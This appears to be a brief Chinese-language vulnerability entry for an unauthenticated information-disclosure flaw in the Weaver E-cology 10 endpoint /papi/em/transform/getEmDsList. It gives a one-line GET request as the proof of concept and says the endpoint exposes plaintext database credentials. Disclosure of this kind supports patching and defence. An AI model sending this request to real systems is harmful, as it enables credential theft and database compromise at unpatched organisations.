泛微E-cology 10 /papi/em/transform/getEmDsList 信息泄露漏洞

2026-03-27 泛微Ecology PoC Public

Description

泛微 E-cology10 系统中的 /papi/em/transform/getEmDsList 接口存在未授权敏感信息泄露漏洞,该接口未对访问者进行身份校验,攻击者可直接通过构造 GET 请求获取系统明文配置的数据库连接地址、账号、密码等核心敏感信息,利用难度极低,可进一步实现数据库远程登录、数据窃取、系统控制等高危攻击,属于高危漏洞。

PoC

GET /papi/em/transform/getEmDsList HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities